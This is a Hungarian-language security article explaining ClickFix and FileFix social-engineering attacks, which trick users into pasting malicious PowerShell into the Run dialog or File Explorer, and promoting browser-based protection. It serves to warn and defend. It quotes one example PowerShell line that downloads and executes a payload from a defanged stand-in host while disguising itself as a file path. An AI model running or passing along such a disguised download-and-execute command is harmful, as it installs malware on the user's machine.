Így működik a ClickFix: átverés egy kattintással
A ClickFix támadásoknál a támadók megtévesztő weboldalt hoznak létre, gyakran például hamis CAPTCHA-ellenőrzéssel. Ha valaki rákattint egy ilyen, látszólag problémát megoldani hivatott elemre, a weboldal észrevétlenül másol rosszindulatú kódot a felhasználó vágólapjára. Ezután felszólítják a felhasználót, hogy igazolja magát – tipikusan úgy, hogy a vágólap tartalmát illessze be a Windows Futtatás ablakába.
Lényeges, hogy a megtévesztett felhasználó ebben a pillanatban maga hajtja végre a támadók kódját a saját gépén, abban a hitben, hogy csak egy, az emberi mivoltát igazoló tesztet erősít meg. Ezzel a trükkel a támadók anélkül tudnak támadni, hogy bármilyen vírus áthágná az operációs rendszer védelmi vonalait – minden az emberi tényezőn múlik.
Valós példa: kattintás egy találatra, kártékony PowerShell a vágólapon
Egy valós céges példában az egyik felhasználó egy keresési találatot követve olyan oldalra tévedt, ahol a támadók már elhelyezték a káros JavaScript kódot. A clickfixes prompt felugrott, és ha nem lett volna aktív a Keep Aware böngészővédelmi rendszer, a felhasználó észrevétlenül másolta volna át a kártékony PowerShell-parancsot, majd futtatta volna azt.
Ezzel szemben a Keep Aware valós időben észlelte, blokkolta, és figyelmeztetett a gyanús kódfeltöltésre, így megelőzte a további fertőzést. Ha nem lép közbe a védelmi rendszer, a támadás a háttérben úgy zajlott volna le, hogy néhány fájlt letölt, lefordítja a kódot, beállítja a fenyegetést a Windows automatikus futtatásához – így minden bejelentkezéskor újraindul a kártevő.
Az ilyen trükkök célja általában káros programok telepítése: például távoli elérésű trójai (RAT), adatszivárogtató programok, illetve további kártevők – például NetSupport Manager, AsyncRAT, Skuld Stealer, Lumma Stealer, DarkGate kártevő vagy DanaBot stealer.
A következő szint: FileFix – már a fájlkezelő is veszélyes
A támadók azonban nem ülnek a babérjaikon; a ClickFix mellett megjelent a FileFix nevű „új generáció”, amelyet biztonsági kutatók idén júniusban fedeztek fel. A FileFix lényege, hogy a felhasználót ráveszi: egy, fájlútvonalnak látszó, de valójában PowerShell-parancsot tartalmazó sort illesszen be közvetlenül a Windows Fájlkezelő címsorába.
A trükk annyira jól álcázott, hogy első pillantásra teljesen ártatlan útvonalnak tűnik – például:
powershell.exe -c “iwr káros[.]webhely/mal.jpg|iex” # C:CégBelsőDrivePályázat.pdf
A komment mögé rejtett fájlútvonal eltereli a figyelmet, miközben a valós fenyegetés (a letöltött kártevő) már a háttérben aktiválódik.
Fontos, hogy a FileFix ugyanarra az elvre épül, mint a ClickFix: mindkettő a vágólap manipulálásához és ahhoz kéri a felhasználó segítségét, hogy maga hajtsa végre a futtatáshoz szükséges parancsokat a saját gépén. A fő különbség, hogy a FileFix a böngészőből átterjed a fájlkezelőre is.
A védekezés leghatékonyabb módja: böngészőalapú védelem
Ennek fényében világos, hogy a hagyományos vírusirtók és klasszikus IT-védelem gyakran vak a vágólap manipulációjára és a böngészőben megbúvó fenyegetésekre. Az ilyen támadások elleni védelem kulcsa, hogy már a böngészőben felismerjük a csalafinta vágólap-módosításokat, felhasználói interakciókat, és időben blokkoljuk a rossz szándékot.
A Keep Aware és más, böngészőbe épülő, valós idejű védelmi rendszerek képesek azonnal érzékelni a vágólap gyanús feltöltését, blokkolják a kódot, mielőtt az eljuthatna a Windows termináljáig vagy a Fájlkezelőhöz.
Fontos kiemelni, hogy napjaink munkavégzésének nagy része böngészőben történik – és a támadók pontosan ezt használják ki. Aki nem biztosítja megfelelően böngészőjét, az valójában az egész rendszerét kockára teszi.
Mi a tanulság?
A ClickFix és FileFix támadások megjelenése új szintre emelte a social engineering támadásokat: már nemcsak gyanús csatolmányokat kell kerülni, hanem szinte bármilyen weboldaltól, ártalmatlan felugró ablaktól vagy másolásra buzdító üzenettől is óvatosnak kell lenni. Lényeges, hogy a védelem nem csak az antivírusokon, hanem a böngésző belső szabályain és a felhasználói tudatosságon is múlik. Felhasználók és rendszergazdák számára egyszerű szabály: soha ne illesszen be, és ne futtasson le ismeretlen eredetű parancsokat – még akkor sem, ha az egy CAPTCHA-t vagy fájlútvonalat imitál.
